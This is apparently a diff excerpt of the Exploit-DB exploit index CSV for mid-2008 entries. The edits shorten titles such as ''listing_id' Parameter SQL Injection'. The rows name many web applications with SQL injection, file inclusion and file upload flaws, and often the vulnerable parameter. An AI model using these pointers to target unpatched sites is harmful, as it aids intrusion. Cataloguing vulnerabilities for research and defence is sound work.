5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps,0 -5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - 'mod_root' Parameter Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 +5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - 'mod_root' Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0 5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0 -5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' Parameter SQL Injection",2008-06-24,K-159,php,webapps,0 +5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps,0 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps,0 -5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - 'iEve' Parameter SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 -5928,platforms/php/webapps/5928.txt,"HiveMaker Directory 1.0.2 - 'cid' Parameter SQL Injection",2008-06-24,"security fears team",php,webapps,0 -5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - 'bannerid' Parameter SQL Injection",2008-06-24,"Hussin X",php,webapps,0 -5930,platforms/php/webapps/5930.txt,"Link ADS 1 - 'linkid' Parameter SQL Injection",2008-06-24,"Hussin X",php,webapps,0 -5931,platforms/php/webapps/5931.pl,"TOKOKITA - 'produk_id' Parameter SQL Injection",2008-06-24,k1tk4t,php,webapps,0 -5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - 'hal' Parameter SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 -5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - 'zone' Parameter Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 -5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - 'sb_jokeid' Parameter SQL Injection",2008-06-25,"Hussin X",php,webapps,0 -5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 +5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - 'iEve' SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 +5928,platforms/php/webapps/5928.txt,"HiveMaker Directory 1.0.2 - 'cid' SQL Injection",2008-06-24,"security fears team",php,webapps,0 +5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - 'bannerid' SQL Injection",2008-06-24,"Hussin X",php,webapps,0 +5930,platforms/php/webapps/5930.txt,"Link ADS 1 - 'linkid' SQL Injection",2008-06-24,"Hussin X",php,webapps,0 +5931,platforms/php/webapps/5931.pl,"TOKOKITA - 'produk_id' SQL Injection",2008-06-24,k1tk4t,php,webapps,0 +5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - 'hal' SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 +5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - 'zone' Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 +5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - 'sb_jokeid' SQL Injection",2008-06-25,"Hussin X",php,webapps,0 +5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 -5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - 'pid' Parameter SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 +5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - 'pid' SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - 'update_profile.php' Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla! Component netinvoice 1.2.0 SP1 - SQL Injection",2008-06-25,His0k4,php,webapps,0 5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,"CWH Underground",php,webapps,0 5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - SQL Injection / Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 -5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - 'category' Parameter SQL Injection",2008-06-26,boom3rang,php,webapps,0 -5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 +5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - 'category' SQL Injection",2008-06-26,boom3rang,php,webapps,0 +5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusions",2008-06-26,"CWH Underground",php,webapps,0 5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload",2008-06-26,EgiX,php,webapps,0 -5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - 'riddleid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5948,platforms/php/webapps/5948.txt,"Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - 'drinkid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion",2008-06-26,CraCkEr,php,webapps,0 +5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - 'riddleid' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5948,platforms/php/webapps/5948.txt,"Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - 'drinkid' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusions",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - 'Parameters.php' Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 -5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' Parameter SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 -5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' Parameter SQL Injection",2008-06-27,boom3rang,php,webapps,0 +5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 +5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' SQL Injection",2008-06-27,boom3rang,php,webapps,0 5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting",2008-06-28,CraCkEr,php,webapps,0 -5963,platforms/php/webapps/5963.txt,"Joomla! Component jabode - 'id' Parameter SQL Injection",2008-06-28,His0k4,php,webapps,0 -5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' Parameter SQL Injection",2008-06-28,"Hussin X",php,webapps,0 +5963,platforms/php/webapps/5963.txt,"Joomla! Component jabode - 'id' SQL Injection",2008-06-28,His0k4,php,webapps,0 +5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' SQL Injection",2008-06-28,"Hussin X",php,webapps,0 5965,platforms/php/webapps/5965.txt,"Joomla! Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0 -5966,platforms/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Parameter Blind SQL Injection",2008-06-28,His0k4,php,webapps,0 +5966,platforms/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0 -5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' Parameter SQL Injection",2008-06-30,anonymous,php,webapps,0 -5970,platforms/php/webapps/5970.txt,"eSHOP100 - 'SUB' Parameter SQL Injection",2008-06-30,JuDge,php,webapps,0 +5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' SQL Injection",2008-06-30,anonymous,php,webapps,0 +5970,platforms/php/webapps/5970.txt,"eSHOP100 - 'SUB' SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,php,webapps,0 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0 @@ -19883,27 +19884,27 @@ id,file,description,date,author,platform,type,port 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0 5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 -5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 +5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 -5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 -5984,platforms/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 -5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 +5984,platforms/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0 -5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' Parameter SQL Injection",2008-07-01,Kacak,php,webapps,0 -5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' Parameter SQL Injection",2008-07-01,"Hussin X",php,webapps,0 -5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' Parameter SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 -5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' Parameter SQL Injection",2008-07-01,Houssamix,php,webapps,0 -5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' Parameter SQL Injection",2008-07-02,haZl0oh,php,webapps,0 -5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Parameter Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 -5993,platforms/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' Parameter SQL Injection",2008-07-02,His0k4,php,webapps,0 +5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,php,webapps,0 +5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' SQL Injection",2008-07-01,"Hussin X",php,webapps,0 +5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 +5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' SQL Injection",2008-07-01,Houssamix,php,webapps,0 +5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' SQL Injection",2008-07-02,haZl0oh,php,webapps,0 +5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 +5993,platforms/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' SQL Injection",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla! Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,php,webapps,0 5995,platforms/php/webapps/5995.pl,"Joomla! Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,php,webapps,0 5996,platforms/php/webapps/5996.txt,"PHPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0 5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,php,webapps,0 -5998,platforms/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' Parameter SQL Injection",2008-07-03,storm,php,webapps,0 -5999,platforms/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' Parameter SQL Injection",2008-07-03,"Virangar Security",php,webapps,0 +5998,platforms/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' SQL Injection",2008-07-03,storm,php,webapps,0 +5999,platforms/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' SQL Injection",2008-07-03,"Virangar Security",php,webapps,0 6000,platforms/php/webapps/6000.txt,"pHNews CMS Alpha 1 - Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0 -6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Local/Remote File Inclusion",2008-07-04,DSecRG,php,webapps,0 +6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Local/Remote File Inclusions",2008-07-04,DSecRG,php,webapps,0 6002,platforms/php/webapps/6002.pl,"Joomla! Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps,0 6003,platforms/php/webapps/6003.txt,"Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0 6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,php,webapps,0 @@ -19911,39 +19912,39 @@ id,file,description,date,author,platform,type,port 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting",2008-07-05,Cr@zy_King,php,webapps,0 6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,php,webapps,0 6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps,0 -6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' Parameter SQL Injection",2008-07-06,"HIva Team",php,webapps,0 +6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0 6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting",2008-07-06,"CWH Underground",php,webapps,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 -6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Parameter Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 +6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 6017,platforms/php/webapps/6017.pl,"Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection",2008-07-07,girex,php,webapps,0 6018,platforms/php/webapps/6018.pl,"QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0 6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0 -6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' Parameter SQL Injection",2008-07-08,unknown_styler,php,webapps,0 +6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusions",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 +6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 -6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Parameter Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 +6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - 'pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 -6034,platforms/php/webapps/6034.txt,"DreamPics Builder - 'page' Parameter SQL Injection",2008-07-09,"Hussin X",php,webapps,0 -6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' Parameter SQL Injection",2008-07-10,"Hussin X",php,webapps,0 -6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 +6034,platforms/php/webapps/6034.txt,"DreamPics Builder - 'page' SQL Injection",2008-07-09,"Hussin X",php,webapps,0 +6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0 +6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 6037,platforms/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 -6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' Parameter SQL Injection",2008-07-11,"Hussin X",php,webapps,0 +6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0 -6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0 +6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0 +6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0 6055,platforms/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",php,webapps,0 -6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' Parameter SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 +6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,php,webapps,0 6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0 @@ -19959,145 +19960,145 @@ id,file,description,date,author,platform,type,port 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 -6074,platforms/php/webapps/6074.txt,"Pluck CMS 4.5.1 (Windows) - 'blogpost' Parameter Local File Inclusion",2008-07-14,BugReport.IR,php,webapps,0 +6074,platforms/php/webapps/6074.txt,"Pluck CMS 4.5.1 (Windows) - 'blogpost' Local File Inclusion",2008-07-14,BugReport.IR,php,webapps,0 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection",2008-07-15,StAkeR,php,webapps,0 -6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 -6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 -6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0 -6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 +6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusions",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 +6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 +6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' SQL Injection",2008-07-15,K-159,php,webapps,0 +6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,php,webapps,0 6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,php,webapps,0 6086,platforms/php/webapps/6086.txt,"Joomla! Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps,0 -6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection",2008-07-16,"Hussin X",php,webapps,0 +6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' SQL Injection",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps,0 -6091,platforms/php/webapps/6091.txt,"PHPHoo3 < 5.2.6 - 'viewCat' Parameter SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection",2008-07-17,"Hussin X",php,webapps,0 +6091,platforms/php/webapps/6091.txt,"PHPHoo3 < 5.2.6 - 'viewCat' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 +6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' SQL Injection",2008-07-17,"Hussin X",php,webapps,0 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (1)",2008-07-17,QTRinux,php,webapps,0 +6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,php,webapps,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 -6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 -6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'key' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 +6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Blind SQL 